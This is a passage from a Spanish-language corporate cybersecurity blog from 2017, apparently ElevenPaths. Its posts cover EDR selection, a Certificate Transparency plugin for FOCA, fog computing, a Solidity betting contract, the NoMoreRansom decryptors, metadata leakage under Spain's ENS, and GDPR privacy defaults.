maliciosas. Por ejemplo, retorcer la terminología de "malware", algunos gráficos confusos, o el hecho de “ignorar” el adware agresivo o los clickers dentro de la categoría PHA, impacta directamente sobre la credibilidad del informe. Especialmente cuando se encuentran relacionados con problemas de privacidad: Airpush, uno de los SDKs más conocidos de adware agresivo, continua siendo frecuente dentro del market, como hemos podido constatar gracia a Tacyt (ver abajo captura de pantalla). Además, respecto al malware presente en Google Play y los dispositivos infectados, las cifras relativas a HummingBad y HummingWhale tal vez no sean tan positivas como indica el informe de Google. Como hemos comentado al principio, transmitir mensajes positivos está bien, pero también es importante ser realista. Eso es lo que nos hace mejorar.
12 de mayo de 2017
Estrategias de defensa para la lucha contra las amenazas avanzadas
Los avances tecnológicos, intereses económicos, sociales y políticos han generado un nuevo contexto de amenazas avanzadas que nunca antes se habían presentado. Estas nuevas amenazas son mucho más sofisticadas tecnológicamente, disponen de más recursos y no son detectadas por las soluciones y servicios tradicionales de seguridad. Esta problemática afecta hoy en día tanto a pequeñas como a grandes organizaciones y organismos públicos convirtiéndose todos ellos en un potencial objetivo dado que las soluciones de seguridad tradicionales (AV, firewall, IDS, DLP, etc.) no han sido capaces de dar respuesta de forma efectiva. En este sentido, una protección efectiva frente a este nuevo tipo de amenazas debe combinar medidas de seguridad de infraestructura y perímetro tradicionales, junto con sistemas específicos para la detección de amenazas avanzadas con el fin de dificultar la intrusión inicial, reducir la posibilidad de escalada de privilegios, limitar el daño y detectar cualquier tipo de actividad sospechosa de forma temprana. Adicionalmente tras la materialización de una amenaza, debe ser posible recopilar la información que precisan los investigadores forenses para determinar el daño provocado, cuándo se ha producido y quién es el causante. DIVERSIDAD DE ENFOQUES EN LA INDUSTRIA Como respuesta al escenario actual, la industria está evolucionando ante las nuevas amenazas desarrollando soluciones, tanto ubicadas en la red como en el endpoint, para tratar de cubrir el espectro más amplio posible y así hacer frente a las diferentes variantes y particularidades que las caracterizan. Centrando nuestra atención en las soluciones basadas en endpoint, las cuales se denominan como Endpoint, Detection and Response (EDR, por sus siglas en inglés), pueden categorizarse en dos grandes grupos: aquellas que disponen de mayores capacidades de detección preventiva, es decir, aquellas que detienen la amenaza antes de que sea ejecutada, o en aquellas basadas en detección analítica, es decir, las que monitorizan el comportamiento de todos los eventos del sistema en busca de patrones anómalos que indiquen un posible compromiso. Otra de las visiones que los fabricantes han implementado en las soluciones parte de la premisa de que no existe riesgo cero, por lo que aportan funcionalidades de respuesta que centran su atención en ofrecer características forenses a los analistas para actuar tras la materialización de una amenaza. Si bien por sí mismas, las capacidades de respuesta no ofrecen protección ante amenazas avanzadas, sí suponen un complemento que habitualmente incorporan las soluciones basadas en prevención o en detección. Tras estudiar el problema, se considera que la protección en el endpoint es clave teniendo en cuenta los siguientes aspectos. En primer lugar, utilizar elementos de red resulta ineficaz, dada la movilidad, el uso de sistemas cloud y el crecimiento del uso de canales cifrados de los propios endpoints. En segundo lugar, los usuarios finales son los que interactúan con los sistemas de la información, incluso en algunas ocasiones con permisos de administración o con acceso a información muy sensible, por lo que no debe descartarse que de forma intencionada o no los usuarios sean uno de los principales riesgos a tener en cuenta. RECOMENDACIONES PARA SELECCIONAR UNA SOLUCIÓN En primer lugar, la organización debería preguntarse si necesita una solución de nueva generación para protegerse de las amenazas avanzadas. Partiendo de la premisa de que dispone de alguna solución tradicional, debemos ser conscientes de que la mayoría de estas soluciones se basan en detección mediante firmas y no nos protegen de estas amenazas más avanzadas. Es necesario destacar que cualquier tipo de compañía, independientemente de su tamaño o sector es susceptible de sufrir un ataque avanzado, teniendo en cuenta que la información que albergan es la principal variable que definirá la estrategia de diseño ante amenazas avanzadas. Asimismo, a medida que las empresas más grandes y más maduras incrementan su capacidad de defensa, los cibercriminales ponen su punto de mira en empresas más pequeñas que colaboran con su objetivo final, como puerta de entrada más fácil de abrir. La segunda consideración de la que tendríamos que partir es que no existen soluciones que cubran todo el espectro y que protejan de las amenazas avanzadas. En este sentido, existen diferentes aproximaciones que atienden diferentes necesidades, con ventajas e inconvenientes, pero que ninguna solución por sí sola ha ofrecido un resultado satisfactorio del 100% de las pruebas llevadas a cabo. Para definir nuestra estrategia de protección, en primer lugar, debemos conocer el perfil de riesgo de nuestra organización. Este indicador vendrá definido tanto por la información de que se dispone como por el impacto producido tras un incidente. De la misma manera también debemos conocer para qué tipo de actores somos potenciales objetivos. Finalmente es importante añadir en la ecuación el presupuesto y la capacidad de operación interna, dado que no todas las soluciones tendrán el mismo impacto en términos de coste y de complejidad de operación. Como resultado, se muestra a continuación una tabla a alto nivel que relaciona el riesgo a sufrir un tipo de amenaza según la sensibilidad de información que se maneja, asociado con la capacidad de operación interna y los posibles atacantes. Tabla 1. Riesgo asociado a las organizaciones Como conclusión, si se dispone de una capacidad de operación reducida y no se almacena información extremadamente sensible podrían desplegarse soluciones basadas en prevención o detección, teniendo en cuenta que la mayoría de estas soluciones incorporan ambas funcionalidades en mayor o menor medida. Por el contrario, si la capacidad de operación es alta y se maneja información de alta sensibilidad se recomienda de forma adicional a los sistemas de prevención o detección, soluciones basadas en respuesta. En ocasiones, también se puede considerar la incorporación de sistemas UEBA, ante un riesgo especial contra insider threats. No obstante, será a partir de un estudio consultivo en base a las necesidades reales de la organización cuando se podrá definir de forma concreta la elección de la misma. Otra consideración importante está relacionada con el perfil necesario para poder explotar al máximo estas tecnologías y la capacidad de operación interna, el cliente debe cuestionarse si dispone del personal cualificado, analistas de seguridad expertos, que le permitan explotar de forma independiente la solución desplegada. Una clara tendencia es la contratación de un servicio avanzado de seguridad del endpoint a un proveedor especializado de servicios gestionados (MSSP), que ofrezca llave en mano la solución tecnológica que mejor se adapte a sus necesidades, cuando no se dispone de los recursos adecuados. En este sentido, los proveedores de MSSP disponen de analistas con amplios conocimientos en lo relativo a las últimas amenazas y tecnologías, así como con la capacidad de acceder a fuentes de información específica como la Cyber Threat Alliance (CTA), de la que Elevenpaths es uno de los principales actores. Como conclusión final, queremos resaltar que Telefónica dispone de una estrategia bien definida para la gestión de las amenazas avanzadas, que modula y particulariza para las necesidades reales de nuestros clientes, basándose en las acciones y trabajos realizados desde ElevenPaths, la unidad de ciberseguridad de Telefónica, y los grupos de especialistas y analistas locales que trabajan para nuestros clientes desde cada uno de los nueve SOCs que disponemos. Miguel Ángel de Castro Simón (Senior Cybersecurity Analyst at ElevenPaths) Nikolaos Tsouroulas (Head of Cybersecurity Product Management at ElevenPaths)
10 de mayo de 2017
Nuevo plugin para FOCA: SCT Checker
Desde el punto de vista de un auditor o pentester, conocer si un certificado se encuentra en los logs de Certificate Transparency correspondientes, en cuáles y cuándo fue incluido, puede aportar cierta información interesante que más tarde puede complementar otras fases del proyecto. Con esto en mente, hemos creado un sencillo y nuevo plugin para FOCA, que permitirá consultar el SCT de un certificado incrustado y toda su información correspondiente. Certificate Transparency será obligatorio en Chrome para los nuevos certificados a finales de 2017. Esto significa que se mostrará una alerta en las páginas protegidas por certificados que no estén presentes en los logs que Chrome comprueba para esa fecha. Hace unos meses presentamos el primer plugin para Firefox que añadía esta funcionalidad, y ahora hemos portado esa fórmula a FOCA, para que sus usuarios puedan consultar la información desde diferentes fuentes. Certificate Transparency es una nueva capa de seguridad sobre el ecosistema TLS. Auspiciado por Google, básicamente hace que todos los certificados emitidos sean introducidos en unos servidores especiales llamados logs, para que en el caso de que un atacante cree un certificado falso, se enfrente a un dilema: si el certificado falso no se introduce en los logs, levantaría sospechas, pero si se registra, se detectará más rápido. Un certificado se considera dado de alta en los logs si cuenta con un SCT (Signed Certificate Timestamp). Este SCT se le da al dueño del certificado original cuando se introduce en el log y el navegador debe verificar si es real y está al día. Ahora FOCA puede comprobar el SCT de los certificados gracias a este plugin. Igual que ocurría con el addon de Firefox, en un principio este plugin solo comprueba el SCT incrustado en el certificado. En breve haremos público su código. Pero entre tanto, ya está disponible desde esta dirección para su descarga. La instalación es muy sencilla. Simplemente se almacena la DLL en el directorio de plugins, y se carga desde la interfaz. Es importante recordar que la librería BouncyCastle.Crypto.dll debe copiarse al mismo directorio que el ejecutable de FOCA. Una vez copiado, añadirlo desde el menú de Plugins. Y lanzarlo. Esperamos que os sea de utilidad. Innovación y laboratorio www.elevenpaths.com
8 de mayo de 2017
Cuando la nube está muy lejos
Para la gran mayoría Cloud Computing es un hecho de la vida, pero ¿quién no ha tenido dudas respecto la idoneidad de la nube para ciertos escenarios? En más de una ocasión aspectos como la latencia, la velocidad en la generación de datos, y en consecuencia el gran volumen de estos, el coste de las comunicaciones y las regulaciones proteccionistas, entre otros, imponen limitaciones al uso de un esquema puro “en la nube”. Como solución a estos inconvenientes se destaca una propuesta que permite seguir aprovechando las bondades de los sistemas distribuidos y que surge como un complemento, no una alternativa, a los esquemas anteriores: Fog Computing consiste en acercar el procesamiento de los datos al origen de los mismos para así aprovechar ventajas obvias como baja latencia y otras que iremos descubriendo en el desarrollo de este artículo. El resultado es un mejora substancial en la “calidad del dato.” El caso de IoT En su ambición por conectar todo lo que se pueda, el Internet de las cosas ( IoT, por sus siglas en inglés) impone un modelo comunicacional que se apoya con fuerza en la nube; en algunos casos debido a la relativamente baja capacidad de procesamiento y almacenamiento de los dispositivos finales y en otros con el fin de simplificar la configuración, aumentar la usabilidad y sacar el mayor provecho de la ubicuidad de los usuarios en un enfoque tecnológico que está destinado a masificarse. Pasarela de Comunicaciones y Fog Computing Sensores, Actuadores, Micro-controladores y Conectividad Esto suena muy bien pero presenta desafíos importantes en la medida que esta tendencia inunda las redes con nodos de una manera exponencial. Enumeremos algunos de estos desafíos y dentro de lo posible hagamos referencia a soluciones con las que estamos más familiarizados: Capacidad El agotamiento del espacio de direcciones en el esquema IPv4 nos mostró, una vez más, que todo límite puede superarse. Si bien con IPv6 se tomaron precauciones para que esta vez el techo estuviera bastante alto, la solución al problema, al menos la que está más en uso, fue la traducción de direcciones privadas a públicas y viceversa (NAT, por sus siglas en inglés). En este esquema un nodo de la red local en la frontera es responsable por pre-procesar las cabeceras del tráfico IP para aliviar la presión en la demanda y consiguiente asignación del cada vez más escaso universo de direcciones disponibles. En Fog Computing, también llamada Edge Computing se reconoce la ventaja de hacer cosas en la frontera (más complejas que un simple NAT, por supuesto) para aliviar la presión sobre las redes de comunicaciones y los sistemas centralizados o distribuidos más distantes. Disponibilidad Internet funciona bajo la aplicación en capas de varios servicios en modalidad "mejor esfuerzo", es decir sin garantías en cuanto al nivel de servicio, por lo que no es 100% estable ni confiable en cuanto a transporte se refiere. Esto significa que inevitablemente nuestros nodos IoT encontrarán situaciones en las que perderán conectividad con su "cerebro central". Una arquitectura basada en Fog Computing evita que cada nodo tenga que estar preparado para esta situación. El disponer de un tratamiento de los datos en la frontera brinda mayor resiliencia a la solución. Confidencialidad Esta necesidad ha significado históricamente una barrera de entrada a los servicios en la nube: Como dejar nuestra información sensible (o la de nuestros clientes) en una infraestructura que no controlamos? Una de las funciones que puede asumir el Fog Computing es el pre-procesamiento de los datos antes de subir a la nube para eliminar o disminuir la sensibilidad de los mismos mediante técnicas como por ejemplo la tokenización. Integridad Ya que estamos enumerando la tríada clásica de la Seguridad ( CIA por sus siglas en inglés) no podía faltar la Integridad, esta vez con un enfoque diferente: si asumimos que el Fog Computing nos aporta valor y decidimos implementarlo, cómo garantizamos que la esencia de los datos no se tuerce en el camino? El implementar cualquier sistema intermediario distribuido exige verificar que la integridad de los datos se mantenga ante la pérdida, o posible modificación no deseada, de los datos en alguno de los nodos. Si les interesa el tema, aunque se tratara de un ámbito diferente al que nos ocupa, recomiendo lean la serie de artículos sobre Blockchain. Interoperabilidad Por último, cabe mencionar que todo esto de poco serviría si no es posible usarlo con distintos despliegues de sistemas, de red, de componentes, de nubes, etc. por lo que es crítico que se defina e implemente con base en arquitecturas y estándares abiertos. Para este fin se creó el Consorcio OpenFog con la misión de desarrollar y evolucionar una arquitectura de referencia que permita aprovechar al máximo las posibilidades que ofrece este nuevo paradigma computacional. De manera que si todavía no le has sacado provecho a la nube por considerar que está muy lejos, anímate! Fog Computing puede ser la pieza que te faltaba. Eso sí, no olvides nunca que la seguridad debe estar considerada desde las etapas tempranas de tu proyecto, sea en el campo de IoT o cualquier otro. Arsene Laurent, CISSP, CISM Chief Security Ambassador arsene.laurent@11paths.com @al11sec
26 de abril de 2017
Los bugs de un smart contract podrían arruinar tu apuesta del próximo Real Madrid-Barcelona
Tan solo quedan 80 horas para uno de los partidos más importantes de la temporada futbolística: Real Madrid - FC Barcelona. Y como de costumbre, solemos hacer apuestas sobre estos partidos entre compañeros de trabajo. De forma habitual, un compañero confiable debería hacerse responsable de la recaudación de los participantes que se encuentren en la oficina de forma presencial, además de tener que encontrarse disponible, al menos, hasta el día del partido pudiendo darse la opción de que surgieran agentes boicoteadores. Sin embargo, como no queremos dejar de lado a nuestros compañeros de las diferentes sedes de ElevenPaths y tampoco hemos identificado a ese compañero «confiable durante 80 horas», hemos encontrado la solución perfecta: crear una aplicación descentralizada o dapp sobre la red de Ethereum. Pasos para programar un contrato en Ethereum Esta plataforma, conocida por muchos como Bitcoin 2.0, ofrece la posibilidad de crear contratos de forma nativa en sus propios clientes utilizando un lenguaje específico llamado Solidity (muy parecido a Javascript). En este sentido, el primer paso será preparar nuestro contrato ya sea mediante el cliente de Ethereum o utilizando herramientas online como Browser Solidity que nos irán avisando de los posibles errores de compilación que podamos haber cometido en el proceso de programación del contrato. El código fuente del contrato que hemos preparado está disponible aquí. El segundo paso tratará sobre la lógica del mismo. Los contratos comienzan siempre con la palabra reservada «contract». El nombre elegido del contrato será el mismo que definamos en el constructor que es la función que será llamada cuando el contrato sea desplegado por el organizador del evento. Este constructor solamente se invocará una vez durante su creación con lo que debe hacerse cargo de la inicialización de las variables que hayamos definido a lo largo del mismo. En nuestro caso, el organizador podrá definir el contrato en base a los siguientes parámetros: Por un lado, el precio de la apuesta en finneys (la unidad básica de Ethereum es el ether pero 1 ether equivale a 1000 finneys) teniendo en cuenta que el cambio actual ronda los 50 dólares por ether. Por otro, Los detalles del evento así como unas pequeñas instrucciones sobre los tipos de apuestas considerados válidos. Aunque son totalmente prescindibles, es una forma sencilla de mostrar al usuario sobre qué evento está apostando. Por último, la duración en horas del evento, período durante el cual permitiremos a los participantes enviar sus pronósticos. El objetivo perseguido es limitar la hora máxima para poder apostar con el fin de evitar que alguien cambie el resultado una vez empezado el partido (o incluso después de que haya terminado). Para realizar la conversión utilizamos dos palabras reservadas: «now», que representa el momento actual, y «* 1 hours», que es un pequeño truco para convertir un número a la forma de representar el momento actual que tiene Ethereum. Figura 1. Opciones del contrato. A partir de ahí, la lógica del contrato tiene dos partes principales: hacerPronostico(). Esta función se encarga de gestionar las operaciones de inclusión de nuevos pronósticos por parte de los participantes. La primera comprobación que realizamos es si la hora en la que se invoca la petición es anterior o posterior a la hora límite ya definida en el constructor. En caso afirmativo, verificaremos si la cantidad enviada por el apostante («msg.value») es exactamente la fijada. En caso de que cualquiera de estas dos condiciones no se satisfaga, se registrará en un log que se podrá consultar desde otras aplicaciones. En caso afirmativo, se registrará el pronóstico en un diccionario («mapping») en el que la clave será el resultado y el valor una lista de direcciones que han apostado a ese resultado. Como Ethereum es un proyecto en desarrollo, ha habido que hacer un pequeño workaround porque no está implementado aún el uso de «strings» como claves de diccionario. Para ello usamos la función «_stringAsKey» que convierte una cadena de texto en formato «bytes32». Menos usable, pero funcional. Aunque es prescindible, para que el usuario pueda ver qué apuestas ha realizado una dirección concreta rápidamente, también hemos incluido un nuevo diccionario en el que las claves son de tipo «address» y el valor es una lista de «strings» que en este caso almacenará los resultados. El valor de la dirección que ha emitido el pago es «msg.sender» y es el que registraremos en ambos diccionarios así como en los diferentes eventos que iremos logueando. Figura 2. Definición de la primera parte del contrato. pagarGanadores(). Esta función es la de gestión del pago. En nuestro caso, queremos que sea la dirección del organizador la única que pueda indicar al contrato cuál es el resultado final del partido para lo que haremos la comprobación de si el «msg.sender» que invoca la función es la dirección definida como «organizador» en el constructor. Si por error u omisión no lo hiciéramos, cualquier persona podría indicar el resultado del partido y llevarse los ethers del resto de apostantes con lo que un error en la lógica implementada por el programador podría derivar en la pérdida del dinero almacenado en el contrato. Afortunadamente, nuestro proceso de resolución es sencillo. Se recoge el resultado facilitado por el organizador y se recupera la lista de ganadores del diccionario pronósticos (nuevamente, hacemos la conversión a «bytes32» que hemos hecho antes). Una vez que sabemos cuántos apostantes han acertado, calculamos el saldo a pagar a cada uno multiplicando el precio por el total de pronósticos y dividiéndolo entre los ganadores para luego recorrer la lista de ganadores y enviar el pago con la función «send(pago)» sobre cada dirección. Es cierto que en Ethereum pueden quedar restos pero el orden de magnitud es muy pequeño ya que la unidad mínima, el wei, es 10-18 ethers. Aunque sean ridículos, una forma de terminar el contrato puede ser enviar al organizador los restos que queden con el comando «suicide(organizador)» en ese momento. Figura 3. Definición de la segunda parte del contrato. La fase del despliegue del contrato En este punto, partimos de la base de que los apostantes tendremos la herramienta Mist instalada para gestionar nuestros ethers, que habremos comprado con anterioridad en algún mercado, así como para lanzar nuestro contrato. Aunque nosotros sí que hemos utilizado ether reales, los que queráis curiosear podéis utilizar también la Testnet en lugar de la Main Network y minar algunos ether de prueba. Estos ether no tienen validez en la red principal, pero sí que se pueden utilizar para al menos familiarizarse con la tecnología. Una vez que tengamos esos requisitos resueltos, tendremos que ir hasta «Contracts» y pulsar en «Deploy new contract». Figura 4. Despliegue del contrato. Tendremos que señalar la dirección que será la que asociemos al contrato y que será la que hará frente al gasto del despliegue del contrato. Si el contrato no da errores de compilación una vez copiado el código fuente podremos invocar al constructor desde la interfaz y nos saldrán las opciones definidas anteriormente ahí mismo. Figura 5. Invocamos al constructor desde la interfaz. Una vez preparado todo, nos requerirá la contraseña que habremos utilizado para proteger nuestra clave privada asociada a la dirección que desplegará el contrato. Esa contraseña debería ser robusta para evitar que un tercero con acceso al equipo la pudiera adivinar fácilmente y llevarse nuestro saldo. Figura 6. Contraseña con la que se protege la clave privada. Interactuando con el contrato Una vez el contrato ha sido añadido a la cadena de bloques, tendremos que facilitar al resto de participantes cierta información para que sepan cómo interactuar con él y puedan realizar sus pronósticos. La información que tendríamos que compartir sería la dirección del contrato, en nuestro caso sería 0x23222e07c972fB5A0b5A007749A4a0F6735C3350, así como la interfaz JSON de este que es la encargada de decir a la aplicación qué formas de interactuar con él están disponibles. Esta información habría que añadirla desde el menú de «Watch contract». Figura 7. Interfaz del contrato en formato JSON. Una vez registrado el contrato, ya lo podremos seleccionar para hacer nuestra apuesta, eligiendo en la parte de la derecha la opción de «Hacer Pronóstico» e introduciendo el resultado (en nuestro caso, los goles separados por un guion y sin espacios) y la cantidad de finneys a abonar. Figura 8. Ejemplo de interactuación con el contrato para colocar un pronóstico. Conclusiones De esta manera y de forma más o menos sencilla y sin apenas recursos, hemos preparado una prueba de concepto de lo que podría ser un sistema de apuestas descentralizadas difícil de controlar. Aunque esto es solo una prueba entre compañeros de trabajo, el negocio sobre Ethereum está evolucionando a pasos agigantados y no se le está dando la importancia necesaria a la seguridad. No podemos perder de vista que el código lanzado no deja de ser código ejecutado en un entorno virtualizado en el que, por error u omisión, al programador se le podría olvidar realizar ciertas comprobaciones como, por ejemplo, la de reembolso o la de terminar el contrato antes de tiempo. En algunos casos, podemos tener la suerte de dar con una empresa a la que poder reclamar nuestro dinero, pero, en otros es probable que el usuario tenga que resignarse a perder su inversión porque no exista ninguna entidad física o jurídica fácil de señalar como responsable de los errores derivados de estas operaciones. Mientras tanto, ¿te fías de nuestro código? Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec Félix Brezo Intelligence Analyst at ElevenPaths @febrezo
20 de abril de 2017
ElevenPaths entra a formar parte de los principales miembros de la alianza de NoMoreRansom.org
El Ransomware ha generado en las empresas tecnológicas y a usuarios en general un impacto muy negativo durante los últimos años. El auge de este tipo de amenazas a las empresas junto al lucrativo negocio que esto supone para los criminales lo convierten en uno de los retos más acuciantes y complejos de ciberseguridad en la actualidad. En este contexto, iniciativas como el proyecto NoMoreRansom (NMR) cobra especial relevancia y tras nueves meses desde su lanzamiento, ha acaparado ya interés por parte de agencias gubernamentales y compañías privadas del sector de la ciberseguridad. La plataforma www.nomoreransom.org tiene el claro objetivo de, por un lado, asistir y permitir a las víctimas del ransomware la recuperación de su documentación cifrada sin tener que pagar a los criminales. Por otro, perseguir desde el plano legal a los responsables de estas estafas compartiendo información entre las fuerzas de seguridad. ElevenPaths aporta su experiencia en este campo desarrollando y ofreciendo gratuitamente una herramienta a esta iniciativa, lo que gracias a la labor del área de innovación y laboratorio, le ha permitido formar parte del consorcio, como una de las siete entidades asociadas, junto con Avast, Bitdefender, CERT de Polonia, Check Point, Emsisoft. Fue cofundada por los cuerpos de la Policía Nacional de Holanda y la Europol junto a las compañías Intel Security y en julio de 2016. Permite una mejor cooperación entre fuerzas y cuerpos del estado con el sector privado en su lucha conjunta contra el ransomware. La plataforma NMR se ha traducido ya a 14 idiomas y contiene más de 40 herramientas de descifrado ofrecidas gratuitamente. Donde las estadísticas muestran que la mayoría de las visitas proceden de Rusia, Holanda, Estados Unidos, Italia y Alemania. Sin la menor duda, los intereses por acotar este mal endémico permitirá que la comunidad generada alrededor de NMR crezca gradualmente, incorporando otros idiomas y herramientas gracias a la lucha constante contra el ransomware. NMR se está convirtiendo en un inestimable punto de encuentro entre los c olaboradores que se acercan para apoyar el proyecto y los miembros asociados que contribuyen con herramientas gratuitas como es el caso de ElevenPaths. Desde el pasado diciembre de 2016, 15 nuevas herramientas se han incorporado al catálogo y son: AVAST: Alcatraz Decryptor, Bart Decryptor, Crypt888 Decryptor, HiddenTear Decryptor, Noobcrypt Decryptor y Cryptomix Decryptor. Bitdefender: Bart Decryptor. CERT de Polonia: Cryptomix/Cryptoshield decryptor. Check Point: Merry X-Mas Decryptor y BarRax Decryptor. ElevenPaths – Telefonica Cyber Security Unit: Popcorn Decryptor. Emsisoft: Crypton Decryptor y Damage Decryptor. Desde diciembre de 2016, 30 nuevos colaboradores se han unido al total de 76 dispuestas a apoyar el proyecto para definir un frente común en contra del ransomware. Los nuevos miembros colaboradores están compuestos por fuerzas y cuerpos del estado de Australia, Belgica, Interpol, Israel, Corea del Sur, Rusia y Ucrania; junto a Acronis International GmbH, Crowdstrike, Cyber Security Canada, DataGravity, Deloitte, eco – Association of the Internet Industry (eco e.V.), ENISA, the Global Cyber Alliance (GCA), the Japan Cyber Control Centre (JC3), KUERT Datenrettung Deutschland GmbH, KÜRT Data Recovery and Information Security Co., mnemonic AS, Neutrino S.r.l., Portugal Telecom, Secura Group Limited, SentinelOne y Verizon Enterprise Solutions. Así como la comunidad de equipos de respuesta temprana de emergencias (CERT), como son AfricaCERT, BA-CSIRT (Buenos Aires), Centro Nacional de Cibersegurança, Certego Incident Response Team, Cybersecurity Malaysia y el Japan Computer Emergency Response Team Coordination Center (JPCERTCC). PopCorn Decryptor y Latch ARW RecoverPopCorn es una utilidad desarrollada desde el área de innovación de ElevenPaths para solucionar la infección producida por el ransomware PopCorn. Con esta aportación se convierte así en uno de los miembros asociados a la alianza, que desde diciembre de 2016, ha ayudado a las más de 10.000 víctimas en todo el planeta. Para más información sobre ransomware y consejos de prevención podéis acudir a ElevenPaths, www.nomoreransom.org y utilizar herramientas propias de prevención como Latch ARW. Innovación y laboratorio www.elevenpaths.com
10 de abril de 2017
El ENS contra la fuga de metadatos
Ya tenemos entre nosotros la nueva Guía de Seguridad de la TIC más concretamente el CCN-STIC-835 que habla concretamente del borrado de los metadatos y datos ocultos como medida de seguridad y protección de la confidencialidad de la información y que debe ser parte de las medidas para cumplir con el ENS (Esquema Nacional de Seguridad). Cada vez hay una mayor concienciación por parte de las empresas y personas en eliminar toda aquella información sensible que exponemos cuando publicamos o compartimos documentos o archivos multimedia. Este problema de seguridad está presente en muchas organizaciones y organismos públicos y de cara a cumplir con el ENS el Ministerio de Hacienda ha creado esta Guía de buenas prácticas que nos enseña cómo realizar la detección y el borrado seguro de metadatos que todos los archivos llevan siempre asociados. Ilustración 1: Información incrustada que puede contener un archivo. Los metadatos y los datos ocultos incluyen información sensible relativa al entorno donde trabajamos, de nosotros mismos y de los dispositivos que manejamos, lo cual hace que en las manos adecuadas y con herramientas apropiadas se conviertan en un riesgo para las organizaciones y sus usuarios, esto es algo que debemos entender. Para evitarlo y como bien recomienda esta guía hay que comenzar a tomar unas sencillas medidas, así como el uso de alguna herramienta que ayude en los procesos. El uso de herramientas para el tratamiento de metadatos facilita y automatiza estos procesos que de otro modo podría ser insoportable. No es lo mismo modificar o eliminar metadatos uno por uno y en cada documento que dejar que una herramienta se encargue de ello automáticamente. La falta de un proceso de tratamiento de archivos adecuado tal como indica el ENS puede perjudicar: Al mantenimiento de la confidencialidad de información que no debería haberse revelado al receptor del documento. Al mantenimiento de la confidencialidad de las fuentes y orígenes de la información, que no debe conocer el receptor del documento. A la buena imagen de la organización que difunde el documento por cuanto demuestra un descuido en su buen hacer. El panorama es más serio de lo que se esperaba. En la siguiente imagen se muestra una pequeña porción de los riesgos y amenazas de la información sensible que contiene habitualmente un documento de uso cotidiano. Ilustración 2: Parte del contenido de metadatos de un documento Word. Esta es solo la punta del iceberg de lo que un solo archivo puede proporcionar. Si a esto le sumamos la información obtenida de otros archivos y le aplicamos ingeniería social, podemos generar un primer esquema del entorno de la organización y los usuarios que trabajan con estos archivos, con la certeza de poder realizar ataques dirigidos más efectivos, manipular a los individuos para realizar ciertas acciones, estudiar pautas de comportamiento, suplantación, etc. El ENS hace especial hincapié en la protección de toda esta información para prevenir su salida incontrolada fuera de la organización por los distintos medios: correo electrónico, sitio web, repositorios documentales, dispositivos de almacenamiento, etc. La medida de protección [mp.info.6] determina que “ En el proceso de limpieza de documentos, se retirará de estos toda la información adicional contenida en campos ocultos, metadatos, comentarios o revisiones anteriores, salvo cuando dicha información sea pertinente para el receptor del documento”. Esta medida unida a una mayor concienciación y formación continua del personal que maneja y gestiona archivos ayudará a entender los riesgos que supone la falta de tratamiento o hacerlo inadecuadamente. Por último, la guía nos permite acceder a un listado de herramientas para la detección y la eliminación de los metadatos, pero tras un primer análisis pudimos observar que necesita una actualización drástica ya que a día de hoy está bastante obsoleta. ¿Quieres prevenir y detectar a tiempo una fuga de información? En ElevenPaths ofrecemos soluciones preventivas contra la fuga de información a través de la familia Metashield. Si quieres saber más sobre el tratamiento de metadatos, habla con nuestros expertos en Ciberseguridad en la Comunidad Técnica de ElevenPaths.
5 de abril de 2017
Desprotegidos por defecto
El Reglamento General de Protección de Datos (GDPR, por sus siglas en inglés), destinado a proporcionar a los ciudadanos de la Unión Europea un mayor control sobre sus datos personales, introduce un nuevo concepto que deberán adaptar tanto fabricantes de tecnología como desarrolladores de aplicaciones y redes sociales: la privacidad por defecto. Con este principio se pretende proporcionar privacidad tanto en el contenido como en los metadatos obtenidos del usuario (por ejemplo, localización y tiempo de la llamada) y que necesitarán encontrarse anonimizados o borrados si el usuario no ha dado su consentimiento. A pesar de que GDPR define el término consentimiento como «un acto afirmativo claro que refleje la voluntad del interesado de aceptar el tratamiento», en la actualidad nos encontramos ante servicios que, por defecto, habilitan casillas ya marcadas de las que el usuario no es consciente. Las opciones que más se repiten en las redes sociales son las siguientes: Permitir que terceros puedan encontrar a otros usuarios. Esta casilla permitiría a terceros encontrar a otros usuarios de la red social en base al correo electrónico o el número de teléfono. Incluso, en Twitter, el uso de esta opción le estaría proporcionando información al usuario objetivo a través de la sección A quién seguir de qué perfil le habría buscado. Figura 1. Opción de visibilidad de Twitter. Personas que quizá conozcas. Esta opción proporcionaría a los usuarios de la red social poder contactar con otras personas en función de datos personales entregado, las redes de las que formas parte o de la actividad realizada. Sin embargo, no sólo Facebook estaría utilizando términos demasiado ambiguos que no permitirían saber con claridad a los usuarios qué información estarían cruzando. Figura 2. Opción de privacidad de Facebook. Recuperación de contraseñas. La recuperación de contraseñas sin que se notifique al usuario (imaginemos que lo hiciera un tercero en el contexto de un potencial ataque) podría suponer una reducción de su privacidad si tras anonimizar su dirección de correo todavía se consigue intuir la información mostrada. Figura 3. Recuperación de contraseñas en Facebook. Recepción de anuncios. El usuario recibirá anuncios personalizados basados en la información compartida con terceros si no deshabilita la casilla de contenido promocionado, tal y como ocurre en Twitter. En este caso, un tercero cedería su información a esta red social, obtenida por ejemplo a través de la suscripción de su boletín, con el objetivo de encontrar usuarios potencialmente interesados y mostrar así el contenido promocionado. Figura 4. Funcionamiento del contenido promocionado en Twitter. No rastrear (Do Not Track o DNT). Al tener desactivada la opción de DNT en el navegador del usuario (revísela también en el dispositivo móvil, ya que suele encontrarse deshabilitada), la red social ofrecerá anuncios o sugerencias personalizadas. Figura 5. Opción Do Not Track en Chrome. Configuración de privacidad solamente a través de la instalación de aplicación. Algunas redes sociales solamente permiten la configuración de privacidad a través de su aplicación móvil, como Instagram y ask.fm. Figura 6. Configuración de privacidad en Instagram. Por otro lado, seguro que nos hemos encontrado en alguna ocasión ante la dificultad de darnos de baja de cierto servicio de internet. En este sentido, están surgiendo proyectos como el de Just Delete que proporciona las direcciones URL exactas de al menos 520 plataformas para poder darse de baja directamente, así como un indicador de su dificultad e información que el usuario necesita conocer sobre dicho proceso. Según los servicios que tiene registrados, la categorización de todas ellas en función del indicador de dificultad para la eliminación de sus datos sería el siguiente: Figura 7. Nivel de dificultad para darse de baja de las plataformas. Hasta que llegue el 25 de mayo de 2018, que es cuando será obligatoria la aplicación de la GDPR en cada Estado miembro de la Unión Europea, esperemos que los aspectos relativos a la privacidad de los usuarios en los servicios que utilicemos en la red no sean tan costosos de leer como los Términos y Condiciones del Servicio Kindle de Amazon, porque... ¿quién tiene ocho horas para leerlos? Y, lo peor de todo, ¿de verdad somos capaces de comprender las implicaciones de lo que leemos? Yaiza Rubio Intelligence Analyst at ElevenPaths @yrubiosec
